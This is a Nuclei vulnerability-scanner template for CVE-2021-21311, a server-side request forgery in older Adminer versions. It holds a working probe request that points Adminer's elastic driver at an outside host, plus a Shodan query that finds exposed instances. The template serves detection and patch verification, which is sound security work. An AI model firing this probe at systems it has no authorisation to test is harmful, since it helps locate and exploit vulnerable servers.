nuclei-templates/cves/2021/CVE-2021-21311.yaml

35 lines
1.1 KiB
YAML

id: CVE-2021-21311
info:
name: Adminer SSRF Using Verbose Error Messages
author: Adam Crosser
severity: high
description: Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9.
reference:
- https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
- https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
metadata:
shodan-query: title:"Login - Adminer"
tags: cve,cve2021,adminer,ssrf
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.20
cve-id: CVE-2021-21311
cwe-id: CWE-918
requests:
- method: GET
path:
- "{{BaseURL}}/adminer?elastic=example.com&username="
matchers-condition: and
matchers:
- type: status
status:
- 403
- type: word
part: body
words:
- "<title>400 - Bad Request</title>"